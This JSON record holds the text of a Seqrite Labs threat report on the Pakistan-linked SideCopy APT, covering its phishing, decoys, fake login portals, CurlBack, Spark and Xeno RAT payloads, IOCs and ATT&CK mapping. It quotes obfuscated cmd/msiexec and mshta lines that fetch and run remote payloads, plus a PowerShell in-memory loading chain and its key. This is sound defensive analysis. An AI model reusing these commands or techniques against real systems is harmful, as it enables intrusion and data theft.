{
	"id": "caeca97b-6ed7-46fa-b8a7-275542ff6452",
	"created_at": "2026-04-06T00:10:49.699777Z",
	"updated_at": "2026-04-10T03:37:41.112926Z",
	"deleted_at": null,
	"sha1_hash": "4bf5f63f9ac5ee363cccdecd9541e313fe8d962c",
	"title": "Goodbye HTA, Hello MSI: New TTPs and Clusters of an APT driven by Multi-Platform Attacks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2235618,
	"plain_text": "Goodbye HTA, Hello MSI: New TTPs and Clusters of an APT driven by\r\nMulti-Platform Attacks\r\nBy Sathwik Ram Prakki\r\nPublished: 2025-04-08 · Archived: 2026-04-05 17:34:11 UTC\r\nSeqrite Labs APT team has uncovered new tactics of Pakistan-linked SideCopy APT deployed since the last week of\r\nDecember 2024. The group has expanded its scope of targeting beyond Indian government, defence, maritime sectors, and\r\nuniversity students to now include entities under railway, oil \u0026 gas, and external affairs ministries. One notable shift in\r\nrecent campaigns is the transition from using HTML Application (HTA) files to adopting Microsoft Installer (MSI) packages\r\nas a primary staging mechanism.\r\nThreat actors are continuously evolving their tactics to evade detection, and this shift is driven by their persistent use of DLL\r\nside-loading and multi-platform intrusions. This evolution also incorporates techniques such as reflective loading and\r\nrepurposing open-source tools such as Xeno RAT and Spark RAT, following its trend with Async RAT to extend its\r\ncapabilities. 
Additionally, a new payload dubbed CurlBack RAT has been identified that registers the victim with the C2\r\nserver.\r\nKey Findings\r\nUsernames associated with attacker email IDs impersonate a government personnel member with a cyber\r\nsecurity background, utilizing compromised IDs.\r\nA fake domain mimicking an e-governance service, with an open directory, is used to host payloads and credential\r\nphishing login pages.\r\nThirteen sub-domains and URLs host login pages for various RTS Services for multiple City Municipal Corporations\r\n(CMCs), all in the state of Maharashtra.\r\nThe official domain of National Hydrology Project (NHP), under the Ministry of Water Resources, has been\r\ncompromised to deliver malicious payloads.\r\nNew tactics such as reflective loading and AES decryption of the resource section via PowerShell are used to deploy a\r\ncustom version of the C#-based open-source tool XenoRAT.\r\nA modified variant of the Golang-based open-source tool SparkRAT, targeting Linux platforms, has been deployed via\r\nthe same stager previously used for Poseidon and Ares RAT payloads.\r\nA new RAT dubbed CurlBack utilizing the DLL side-loading technique is used. It registers the victim with the C2 server via\r\nUUID and supports file transfer using curl.\r\nHoney-trap themed campaigns were observed in January 2025 and June 2024, coinciding with the arrest of a\r\ngovernment employee accused of leaking sensitive data to a Pakistani handler.\r\nA previously compromised education portal seen in Aug 2024 became active again in February 2025 with new URLs\r\ntargeting university students. These employ three different themes: “Climate Change”, “Research Work”, and\r\n“Professional” (Complete analysis can be viewed in the recording here, explaining six different clusters of SideCopy\r\nAPT).\r\nThe parent group of SideCopy, APT36, has targeted Afghanistan after a long time with a theme related to the Office of the\r\nPrisoners Administration (OPA) under the Islamic Emirate of Afghanistan. 
A recent campaign targeting Linux systems\r\nwith the theme “Developing Leadership for Future Wars” involves AES/RC4 encrypted stagers to drop the MeshAgent\r\nRMM tool.\r\nTargeted sectors under the Indian Ministry\r\nRailways\r\nOil \u0026 Gas\r\nExternal Affairs\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 1 of 29\n\nDefence\r\nPhishing Emails\r\nThe campaign targeting the Defence sector begins with a phishing email dated 13 January 2025, with the subject “Update\r\nschedule for NDC 65 as discussed”. The email contains a link to download a file named “NDC65-Updated-Schedule.pdf” to\r\nlure the target.\r\nFig. 1 – NDC Phishing Email (1)\r\nA second phishing email sent on 15 January 2025 with the subject “Policy update for this course.txt” also contains a\r\nphishing link. This email originates from an official-looking email ID which is likely compromised. National Defence\r\nCollege (NDC) is a defence service training institute for the strategy and practice of National Security, located in Delhi and\r\noperating under the Ministry of Defence, India.\r\nFig. 2 – NDC Phishing Email (2)\r\nThe attacker’s email address “gsosystems-ndc@outlook[.]com” was created on 10 January 2025 in the UAE and was last seen\r\nactive on 28 February 2025. OSINT reveals a similar-looking email ID “gsosystems.ndc-mod@nic[.]in” belonging to the National\r\nInformatics Centre (NIC), a department under the Ministry of Electronics and Information Technology (MeitY), India. The\r\nusername linked to the attacker’s email impersonates a government personnel member with a cyber security background.\r\nFig. 
3 – Attacker Email\r\nDecoy Documents\r\nThe decoy is related to the National Defence College (NDC) in India and contains the Annual Training Calendar (Study \u0026\r\nActivities) for the year 2025 for the 65th Course (NDC-65). Located in New Delhi, it is the defence service training institute\r\nand highest seat of strategic learning for officers of the Defence Service (Indian Armed Forces) and the Civil Services, all\r\noperating under the Ministry of Defence, India.\r\nFig. 4 – NDC Calendar Decoy [Defence]\r\nAnother phishing archive file observed with the name “2024-National-Holidays-RH-PER_N-1.zip” comes in two different\r\nvariants targeting either Windows or Linux systems. Once the payload is triggered, it leads to a decoy document that\r\ncontains a list of holidays for the Open Line staff for the year 2024, as the name suggests. This is an official notice from\r\nSouthern Railway dated 19 December 2023, specifically for the Chennai Division. Southern Railway (SR) is one of the\r\neighteen zones of Indian Railways, a state-owned undertaking of the Ministry of Railways, India.\r\nFig. 5 – Holiday List Decoy [Railways]\r\nThe third infection chain includes a document titled “Cybersecurity Guidelines” for the year 2024, which appears to be\r\nissued by Hindustan Petroleum Corporation Limited (HPCL). Headquartered in Mumbai, HPCL is a public sector undertaking\r\nin the petroleum and natural gas industry and is a subsidiary of the Oil and Natural Gas Corporation (ONGC), a state-owned\r\nundertaking of the Ministry of Petroleum and Natural Gas, India.\r\nFig. 
6 – Cybersecurity Guidelines Decoy [Oil \u0026 Gas]\r\nAnother document linked to the same infection is the “Pharmaceutical Product Catalogue” for 2025, issued by MAPRA. It is\r\nspecifically intended for employees of the Ministry of External Affairs (MEA), in India. Mapra Laboratories Pvt. Ltd. is a\r\npharmaceutical company with headquarters in Mumbai.\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 6 of 29\n\nFig. 7 – Catalogue Decoy [External Affairs]\r\nOpenDir and CredPhish\r\nA fake domain impersonating the e-Governance portal services has been utilized to carry out the campaign targeting railway\r\nentities. This domain was created on 16 June 2023 and features an open directory hosting multiple files, identified during the\r\ninvestigation.\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 7 of 29\n\nFig. 8 – Open directory\r\nA total of 13 sub-domains have been identified, which function as login portals for various systems such as:\r\nWebmail\r\nSafety Tank Management System\r\nPayroll System\r\nSet Authority\r\nThese are likely used for credential phishing, actively impersonating multiple legitimate government portals since last year.\r\nThese login pages are typically associated with RTS Services (Right to Public Services Act) and cater to various City\r\nMunicipal Corporations (CMC). All these fake portals belong to cities located within the state of Maharashtra:\r\nChandrapur\r\nGadchiroli\r\nAkola\r\nSatara\r\nVasai Virar\r\nBallarpur\r\nMira Bhaindar\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 8 of 29\n\nFig. 
9 – Login portals hosted on fake domain\r\nThe following table lists the identified sub-domains and the dates they were first observed:\r\nSub-domain First Seen\r\ngadchiroli.egovservice[.]in 2024-12-16\r\npen.egovservice[.]in 2024-11-27\r\ncpcontacts.egovservice[.]in 2024-01-03\r\ncpanel.egovservice[.]in 2024-01-03\r\nwebdisk.egovservice[.]in 2024-01-03\r\ncpcalendars.egovservice[.]in 2024-01-03\r\nwebmail.egovservice[.]in 2024-01-03\r\ndss.egovservice[.]in 2023-11-03\r\ncmc.egovservice[.]in 2023-11-03\r\nmail.egovservice[.]in 2023-10-13\r\npakola.egovservice[.]in 2023-07-23\r\npakora.egovservice[.]in 2023-07-23\r\negovservice[.]in 2023-06-16\r\nAll these domains share the DNS history shown below, primarily registered under AS 140641 (YOTTA NETWORK SERVICES\r\nPRIVATE LIMITED). This indicates a possible coordinated infrastructure set up to impersonate legitimate services and\r\ncollect credentials from unsuspecting users.\r\nFig. 10 – DNS history\r\nFurther investigation into the open directory revealed additional URLs associated with the fake domain. These URLs likely\r\nserve similar phishing purposes and host further decoy content.\r\nhxxps://egovservice.in/vvcmcrts/\r\nhxxps://egovservice.in/vvcmc_safety_tank/\r\nhxxps://egovservice.in/testformonline/test_form\r\nhxxps://egovservice.in/payroll_vvcmc/\r\nhxxps://egovservice.in/pakora/egovservice.in/\r\nhxxps://egovservice.in/dssrts/\r\nhxxps://egovservice.in/cmc/\r\nhxxps://egovservice.in/vvcmcrtsballarpur72/\r\nhxxps://egovservice.in/dss/\r\nhxxps://egovservice.in/130521/set_authority/\r\nhxxps://egovservice.in/130521/13/\r\nCluster-A\r\nThe first cluster of SideCopy’s operations shows a sophisticated approach by simultaneously targeting both Windows and\r\nLinux environments. 
New remote access trojans (RATs) have been added to their arsenal, enhancing their capability to\r\ncompromise diverse systems effectively.\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 10 of 29\n\nFig. 11 – Cluster A\r\nWindows\r\nA spear-phishing email link downloads an archive file, that contains double extension (.pdf.lnk) shortcut. They are hosted on\r\ndomains that look to be legitimate:\r\nhxxps://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/\r\nhxxps://nhp.mowr.gov.in/NHPMIS/TrainingMaterial/aspx/Security-Guidelines/\r\nThe shortcut triggers cmd.exe with arguments that utilize escape characters (^) to evade detection and reduce readability. A\r\nnew machine ID “dv-kevin” is seen with these files as we see “desktop-” prefix in its place usually.\r\nFig. 12 – Shortcuts with double extension\r\nUtility msiexec.exe is used for installing the MSI packages that are hosted remotely. It uses quiet mode flag with the\r\ninstallation switch.\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 11 of 29\n\nC:\\Windows\\System32\\cmd.exe /c m^s^i^e^x^e^c.exe /q /i\r\nh^t^t^p^s^:^/^/^e^g^o^v^s^e^r^v^i^c^e^.^i^n^/^d^s^s^r^t^s^/^h^e^l^p^e^r^s^/^f^o^n^t^s^/^2^0^2^4^-^N^a^t^i^o^nal-\r\n^H^o^l^i^d^a^y^s^-^R^H^-^P^E^R^_^N-^1^/^i^n^s^t^/\r\nC:\\Windows\\System32\\cmd.exe /c m^s^i^e^x^e^c.exe /q /i\r\nh^t^t^p^s^:^/^/^n^h^p^.^m^o^w^r^.^g^o^v^.^i^n^/^N^H^P^M^I^S^/^T^r^a^i^n^i^n^g^M^a^t^e^r^i^a^l^/^a^s^p^x^/^S^e^c^u^r^i^\r\n^G^u^i^d^e^l^i^n^e^s^/^w^o^n^t^/\r\nThe first domain mimics a fake e-governance site seen with the open directory, while the second one is a compromised\r\ndomain that belongs to the official National Hydrology Project, an entity under the Ministry of Water Resources. The MSI\r\ncontains a .NET executable ConsoleApp1.exe which drops multiple PE files that are base64 encoded. 
Firstly, the decoy\r\ndocument is dropped in the Public directory and opened, whereas the remaining PE files are dropped in\r\n‘C:\\ProgramData\\LavaSoft\\’. Among them are two DLLs:\r\nLegitimate DLL: Sampeose.dll\r\nMalicious DLL: DUI70.dll, identified as CurlBack RAT.\r\nFig. 13 – Dropper within MSI package\r\nCurlBack RAT\r\nA signed Windows binary girbesre.exe with the original name CameraSettingsUIHost.exe is dropped beside the DLLs. Upon\r\nexecution, the EXE side-loads the malicious DLL. Persistence is achieved by dropping an HTA script (svnides.hta) that\r\ncreates a Run registry key for the EXE. Two different malicious DLL samples were found, with compilation\r\ntimestamps of 2024-12-24 and 2024-12-30.\r\nFig. 14 – Checking response ‘/antivmcommand’\r\nCurlBack RAT initially checks the response of a specific URL with the command ‘/antivmcommand’. If the response is\r\n“on”, it proceeds; otherwise it terminates itself, so the C2 response acts as an execution gate. It gathers system information and any\r\nconnected USB devices using the registry key:\r\n“SYSTEM\\\\ControlSet001\\\\Enum\\\\USBSTOR”\r\nFig. 15 – Retrieving system info and USB devices\r\nConnected displays and running processes are enumerated to check for explorer, msedge, chrome, notepad, taskmgr,\r\nservices, defender, and settings.\r\nFig. 16 – Enumerate displays and processes\r\nNext, it generates a UUID for client registration with the C2 server. The generated ID is dumped at\r\n“C:\\Users\\\u003cusername\u003e\\.client_id.txt” along with the username.\r\nFig. 
17 – Client ID generated for C2 registration\r\nBefore registering with the ID, persistence is set up via scheduled task with the name “OneDrive” for the legitimate binary,\r\nwhich can be observed at the location: “C:\\Windows\\System32\\Tasks\\OneDrive”.\r\nFig. 18 – Scheduled Task\r\nReversed strings appended to the C2 domain and their purpose:\r\nString Functionality\r\n/retsiger/ Register client with the C2\r\n/sdnammoc/ Fetch commands from C2\r\n/taebtraeh/ Check connection with C2 regularly\r\n/stluser/ Upload results to the C2\r\nOnce registered, the connection is kept alive to retrieve any commands that are returned in the response.\r\nFig. 19 – Commands response after registration\r\nIf the response contains any value, it retrieves the current timestamp and executes one of the following C2 commands:\r\nCommand Functionality\r\ninfo Gather system information\r\ndownload Download files from the host\r\npersistence Modify persistence settings\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 14 of 29\n\nrun Execute arbitrary commands\r\nextract Extract data from the system\r\npermission Check and elevate privileges\r\nusers Enumerate user accounts\r\ncmd Execute command-line operations\r\nFig. 20 – Checking process privilege with ‘permission’ command\r\nOther basic functions include fetching user and host details, extracting archive files, and creating tasks. Strings and code\r\nshow that CURL within the malicious DLL is present to enumerate and transfer various file formats:\r\nImage files: GIF, JPEG, JPG, SVG\r\nText files: TXT, HTML, PDF, XML\r\nFig. 21 – CURL protocols supported\r\nLinux\r\nIn addition to its Windows-focused attacks, the first cluster of SideCopy also targets Linux environments. The malicious\r\narchive file shares the same name as its Windows counterpart, but with a modification date of 2024-12-20. 
This archive\r\ncontains a Go-based ELF binary, reflecting a consistent cross-platform strategy. Upon analysis, the function flow of the\r\nstager has code similarity to the stagers associated with Poseidon and Ares RAT. These are linked to Transparent Tribe and\r\nSideCopy APTs respectively.\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 15 of 29\n\nFig. 22 – Golang Stager for Linux\r\nStager functionality:\r\n1. Uses wget command to download a decoy from egovservice domain into the target directory /.local/share and open it\r\n(National-Holidays-RH-PER_N-1.pdf).\r\n2. Download the final payload elf as /.local/share/xdg-open and execute.\r\n3. Create a crontab ‘/dev/shm/mycron’ to maintain persistence through system reboot for the payload, under the current\r\nusername.\r\nThe final payload delivered by the stager is Spark RAT, an open-source remote access trojan with cross-platform support for\r\nWindows, macOS, and Linux systems. Written in Golang and released on GitHub in 2022, the RAT is very popular with\r\nover 500 forks. Spark RAT uses WebSocket protocol and HTTP requests to communicate with the C2 server.\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 16 of 29\n\nFig. 23 – Custom Spark RAT ‘thunder’ connecting to C2\r\nFeatures of Spark RAT include process management and termination, network traffic monitoring, file exploration and\r\ntransfer, file editing and deletion, code highlighting, desktop monitoring, screenshot capture, OS information retrieval, and\r\nremote terminal access. 
Additionally, it supports power management functions like shutdown, reboot, log-off, sleep,\r\nhibernate and lock screen.\r\nCluster-B\r\nThe second cluster of SideCopy’s activities targets Windows systems, although we suspect that it is also targeting Linux systems\r\nbased on their infrastructure observed since 2023.\r\nFig. 24 – Cluster B\r\nThe infection starts with a spear-phishing email link that downloads an archive file named ‘NDC65-Updated-Schedule.zip’.\r\nThis contains a shortcut file in double extension format which triggers a remote HTA file hosted on another compromised\r\ndomain:\r\n“hxxps://modspaceinterior.com/wp-content/upgrade/01/ \u0026 mshta.exe”\r\nFig. 25 – Archive with malicious LNK\r\nThe machine ID associated with the LNK “desktop-ey8nc5b” has been observed in previous campaigns of SideCopy,\r\nalthough the modification date ‘2023:05:26’ suggests it may be an older one being reused. In parallel to the MSI stagers, the\r\ngroup continues to utilize HTA-based stagers which remain almost fully undetected (FUD).\r\nFig. 26 – Almost FUD stager of HTA\r\nThe HTA file contains a Base64 encoded .NET payload BroaderAspect.dll, which is decoded and loaded directly into the\r\nmemory of MSHTA. This binary opens the dropped NDC decoy document in the ProgramData directory and an additional .NET\r\nstager as a PDF in the Public directory. 
Persistence is set via a Run registry key with the name “Edgre” and executes as:\r\ncmd /C start C:\\Users\\Public\\USOShared-1de48789-1285\\zuidrt.pdf\r\nEncrypted Payload\r\nThe dropped .NET binary named ‘Myapp.pdb’ has two resource files:\r\n“Myapp.Resources.Document.pdf”\r\n“Myapp.Properties.Resources.resources”\r\nThe first one is decoded using a Caesar cipher with a shift of 9 characters in the backward direction. It is dropped as\r\n‘Public\\Downloads\\Document.pdf’ (122.98 KB), which is a 2004 GIAC Paper on “Advanced communication techniques of\r\nremote access trojan horses on windows operating systems”.\r\nFig. 27 – Document with appended payload\r\nThough it is not a decoy, an encrypted payload is appended at the end. The malware searches for the “%%EOF” marker to\r\nseparate PDF data from EXE data. The PDF data is extracted from the start to the marker, while the EXE data is extracted\r\nafter skipping 6 bytes beyond the marker.\r\nFig. 28 – Extracting EXE after EOF marker\r\nAfter some delay, the EXE data is dropped as “Public\\Downloads\\suport.exe” (49.53 KB), which is sent as an argument\r\nalong with a key to trigger a PowerShell command.\r\nFig. 29 – Extracting resource and triggering PowerShell\r\nPowerShell Stage\r\nThe PowerShell command is executed with the basic arguments “-NoProfile -ExecutionPolicy Bypass -Command” to ignore\r\npolicies and the profile. Two parameters are sent:\r\n-EPath 'C:\\\\Users\\\\Public\\\\Downloads\\\\suport.exe'\r\n-EKey 'wq6AHvkMcSKA++1CPE3yVwg2CpdQhEzGbdarOwOrXe0='\r\nAfter some delay, the encryption key is decoded from Base64, and the first 16 bytes are treated as the IV for AES encryption\r\n(CBC mode with PKCS7 padding). 
This is done to load the decrypted binary as a .NET assembly directly into memory,\r\ninvoking its entry point.\r\nFig. 30 – PowerShell decryption\r\nCustom Xeno RAT\r\nDumping the final .NET payload named ‘DevApp.exe’ leads us to familiar functions seen in Xeno RAT. It is an open source\r\nremote access trojan that was first seen at the end of 2023. Key features include HVNC, live microphone access, socks5\r\nreverse proxy, UAC bypass, keylogger, and more. The custom variant used by SideCopy has added basic string\r\nmanipulation methods with C2 and port as 79.141.161[.]58:1256.\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 21 of 29\n\nFig. 31 – Custom Xeno RAT\r\nLast year, a custom Xeno RAT variant named MoonPeak was used by a North Korean-linked APT tracked as UAT-5394.\r\nSimilarly, custom Spark RAT variants have been adopted by Chinese-speaking actors such as DragonSpark and TAG-100.\r\nInfrastructure and Attribution\r\nDomains used for malware staging by the threat group. Most of them have registrar as GoDaddy.com, LLC.\r\nStaging Domain First Seen Created ASN\r\nmodspaceinterior[.]com Jan 2025 Sept 2024 AS 46606 – GoDaddy\r\ndrjagrutichavan[.]com Jan 2025 Oct 2021 AS 394695 – GoDaddy\r\nnhp.mowr[.]gov[.]in Dec 2024 Feb 2005 AS 4758 – National Informatics Centre\r\negovservice[.]in Dec 2024 June 2023 AS 140641 – GoDaddy\r\npmshriggssssiwan[.]in Nov 2024 Mar 2024 AS 47583 – Hostinger\r\neducationportals[.]in Aug 2024 Aug 2024 AS 22612 – NameCheap\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 22 of 29\n\nC2 domains have been created just before the campaign in the last week of December 2024. 
With the Canadian registrar\r\n“Internet Domain Service BS Corp.”, they resolve to IPs with Cloudflare ASN 13335 located in California.\r\nC2 Domain Created IP ASN\r\nupdates.widgetservicecenter[.]com 2024-Dec-25\r\n104.21.15[.]163\r\n172.67.163[.]31\r\nASN 13335 – Cloudflare\r\nupdates.biossysinternal[.]com 2024-Dec-23\r\n172.67.167[.]230\r\n104.21.13[.]17\r\nASN 202015 – HZ Hosting Ltd.\r\nThe C2 for Xeno RAT 79.141.161[.]58 has a unique common name (CN=PACKERP-63KUN8U) with HZ Hosting Limited\r\nof ASN 202015. The port used for communication is 1256, but an open RDP port 56777 is also observed.\r\nFig. 32 – Diamond Model\r\nBoth C2 domains are associated with Cloudflare ASN 13335, resolved to the IP range 172.67.xx.xx. Similar C2 domains on this\r\nASN have previously been leveraged by SideCopy in attacks targeting the maritime sector. Considering the past infection\r\nclusters, observed TTPs and hosted open directories, these campaigns with new TTPs are attributed to SideCopy with high\r\nconfidence.\r\nConclusion\r\nThe Pakistan-linked SideCopy APT group has significantly evolved its tactics since late December 2024, expanding its targets to\r\ninclude critical sectors such as railways, oil \u0026 gas, and external affairs ministries. The group has shifted from using HTA\r\nfiles to MSI packages as a primary staging mechanism and continues to employ advanced techniques like DLL side-loading,\r\nreflective loading, and AES decryption via PowerShell. Additionally, they are leveraging customized open-source tools like\r\nXeno RAT and Spark RAT, along with deploying the newly identified CurlBack RAT. 
Compromised domains and fake sites\r\nare being utilized for credential phishing and payload hosting, highlighting the group’s ongoing efforts to enhance\r\npersistence and evade detection.\r\nSEQRITE Protection\r\nLNK.SideCopy.49245.Gen\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 23 of 29\n\nLNK.Trojan.49363.GC\r\nSideCopy.Mal.49246.GC\r\nHTA.SideCopy.49248.Gen\r\nHTA.SideCopy.49247.Gen\r\nHTA.Trojan.49362.GC\r\nTrojan.Fmq\r\nIOCs\r\nWindows\r\na5410b76d0cb36786e00d2968d3ab6e4 2024-National-Holidays-RH-PER_N-1.zip\r\nf404496abccfa93eed5dfda9d8a53dc6 2024-National-Holidays-RH-PER_N-1.pdf.lnk\r\n0e57890a3ba16b1ac0117a624f262e61 Security-Guidelines.zip\r\n57c2f8b4bbf4037439317a44c2263346 Security-Guidelines.pdf.lnk\r\n53eebedc3846b7cf5e29a90a5b96c803 wininstaller.msi\r\n97c3328427b72f05f120e9a98b6f9b09 installerr.msi\r\n0690116134586d41a23baed300fc6355 ConsoleApp1.exe\r\nef40f484e095f0f6f207139cb870a16e ConsoleApp1.exe\r\n9d189e06d3c4cefdd226e645a0b8bdb9 DUI70.dll\r\n589a65e0f3fe6777d17d0ac36ab07f6f DUI70.dll\r\n0eb9e8bec7cc70d603d2d8b6efdd6bb5 update schedule for ndc 65 as discussed.txt\r\n8ceeeec0e33026114f028cbb006cb7fc policy update for this course.txt\r\n1d65fa0457a9917809660fff782689fe NDC65-Updated-Schedule.zip\r\n7637cbfa99110fe8e1074e7ead66710e NDC65-Updated-Schedule.pdf.lnk\r\n32a44a8f7b722b078b647e82cb9e85cf NDC65-Updated-Schedule.hta\r\na2dc9654b99f656b4ab30cf5d97fe2e1 BroaderAspect.dll\r\nb45aa156aef2ad2c77b7c623a222f453 zuidrt.pdf\r\n83ce6ee6ad09a466eb96f347a8b0dc20 Document.pdf\r\ncf6681cf1f765edb6cae81eeed389f78 suport.exe\r\nc952aca2036d6646c0cffde9e6f22775 DevApp.exe (Custom Xeno RAT)\r\nLinux\r\nb5e71ff3932c5ef6319b7ca70f7ba8da 2024-National-Holidays-RH-PER_N-1.zip\r\n0a67bfda993152c93a212087677f9b60 2024-National-Holidays-RH-PER_N-1․pdf\r\ne165114280204c39e99cf0c650477bf8 clinsixfer.elf (Custom Spark 
RAT)\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 24 of 29\n\nC2\r\n79.141.161[.]58:1256 Xeno RAT\r\nupdates.widgetservicecenter[.]com\r\nupdates.biossysinternal[.]com\r\nCurlBack RAT\r\nURLs\r\nhxxps://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/\r\nhxxps://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/inst/\r\nhxxp://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/lns/clinsixfer.elf\r\nhxxp://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/lns/2024-National-Holidays-RH-PER_N-1.pdf\r\nhxxps://nhp.mowr.gov.in/NHPMIS/TrainingMaterial/aspx/Security-Guidelines/\r\nhxxps://nhp.mowr.gov.in/NHPMIS/TrainingMaterial/aspx/Security-Guidelines/wont/\r\nhxxps://updates.widgetservicecenter.com/antivmcommand\r\nhxxps://modspaceinterior.com/wp-content/upgrade/02/NDC65-Updated-Schedule.zip\r\nhxxps://modspaceinterior.com/wp-content/upgrade/01/\r\nhxxps://modspaceinterior.com/wp-content/upgrade/01/NDC65-Updated-Schedule.hta\r\nhxxps://egovservice.in/vvcmcrts/\r\nhxxps://egovservice.in/vvcmc_safety_tank/\r\nhxxps://egovservice.in/testformonline/test_form\r\nhxxps://egovservice.in/payroll_vvcmc/\r\nhxxps://egovservice.in/pakora/egovservice.in/\r\nhxxps://egovservice.in/dssrts/\r\nhxxps://egovservice.in/cmc/\r\nhxxps://egovservice.in/vvcmcrtsballarpur72/\r\nhxxps://egovservice.in/dss/\r\nhxxps://egovservice.in/130521/set_authority/\r\nhxxps://egovservice.in/130521/13/\r\nStaging domains\r\nmodspaceinterior[.]com\r\ndrjagrutichavan[.]com\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 25 of 
29\n\nnhp.mowr[.]gov[.]in\r\npmshriggssssiwan[.]in\r\neducationportals[.]in\r\negovservice[.]in\r\ngadchiroli.egovservice[.]in\r\npen.egovservice[.]in\r\ncpcontacts.egovservice[.]in\r\ncpanel.egovservice[.]in\r\nwebdisk.egovservice[.]in\r\ncpcalendars.egovservice[.]in\r\nwebmail.egovservice[.]in\r\nwww.dss.egovservice[.]in\r\nwww.cmc.egovservice[.]in\r\ncmc.egovservice[.]in\r\ndss.egovservice[.]in\r\nmail.egovservice[.]in\r\nwww.egovservice[.]in\r\nwww.pakola.egovservice[.]in\r\npakola.egovservice[.]in\r\nwww.pakora.egovservice[.]in\r\npakora.egovservice[.]in\r\nHost and PDB\r\nC:\\ProgramData\\LavaSoft\\Sampeose.dll\r\nC:\\ProgramData\\LavaSoft\\DUI70.dll\r\nC:\\ProgramData\\LavaSoft\\girbesre.exe\r\nC:\\ProgramData\\LavaSoft\\svnides.hta\r\nC:\\Users\\Public\\USOShared-1de48789-1285\\zuidrt.pdf\r\nC:\\Users\\Public\\Downloads\\Document.pdf\r\nC:\\Users\\Public\\Downloads\\suport.exe\r\nE:\\finalRnd\\Myapp\\obj\\Debug\\Myapp.pdb\r\nDecoys\r\n320bc4426f4f152d009b6379b5257c78 2024-National-Holidays-RH-PER_N-1.pdf\r\n9de50f9357187b623b06fc051e3cac4f Security-Guidelines.pdf\r\nc9c98cf1624ec4717916414922f196be NDC65-Updated-Schedule.pdf\r\n83ce6ee6ad09a466eb96f347a8b0dc20 Document.pdf\r\nMITRE ATT\u0026CK\r\nTTP Name\r\nReconnaissance\r\nT1589.002 Gather Victim Identity Information: Email Addresses\r\nResource Development\r\nT1583.001 Acquire Infrastructure: Domains\r\nT1584.001 Compromise Infrastructure: Domains\r\nT1587.001 Develop Capabilities: Malware\r\nT1588.001 Obtain Capabilities: Malware\r\nT1588.002 Obtain Capabilities: Tool\r\nT1608.001 Stage Capabilities: Upload Malware\r\nT1608.005 Stage Capabilities: Link Target\r\nT1585.002 Establish Accounts: Email Accounts\r\nT1586.002 Compromise Accounts: Email Accounts\r\nInitial Access\r\nT1566.002 Phishing: Spear phishing Link\r\nExecution\r\nT1106 Native API\r\nT1129 Shared Modules\r\nT1059 Command and Scripting Interpreter\r\nT1047 Windows Management Instrumentation\r\nT1204.001 User Execution: Malicious Link\r\nT1204.002 User Execution: Malicious File\r\nPersistence\r\nT1053.003 Scheduled Task/Job: Cron\r\nT1547.001 Registry Run Keys / Startup Folder\r\nPrivilege Escalation\r\nT1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control\r\nDefense Evasion\r\nT1036.005 Masquerading: Match Legitimate Name or Location\r\nT1036.007 Masquerading: Double File Extension\r\nT1140 Deobfuscate/Decode Files or Information\r\nT1218.005 System Binary Proxy Execution: Mshta\r\nT1574.002 Hijack Execution Flow: DLL Side-Loading\r\nT1027 Obfuscated Files or Information\r\nT1620 Reflective Code Loading\r\nDiscovery\r\nT1012 Query Registry\r\nT1016 System Network Configuration Discovery\r\nT1033 System Owner/User Discovery\r\nT1057 Process Discovery\r\nT1082 System Information Discovery\r\nT1083 File and Directory Discovery\r\nT1518.001 Software Discovery: Security Software Discovery\r\nCollection\r\nT1005 Data from Local System\r\nT1056.001 Input Capture: Keylogging\r\nT1123 Audio Capture\r\nT1113 Screen Capture\r\nT1560.001 Archive Collected Data: Archive via Utility\r\nCommand and Control\r\nT1105 Ingress Tool Transfer\r\nT1571 Non-Standard Port\r\nExfiltration\r\nT1041 Exfiltration Over C2 Channel\r\nAuthors:\r\nSathwik Ram Prakki\r\nKartikkumar Jivani\r\nSource: 
https://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
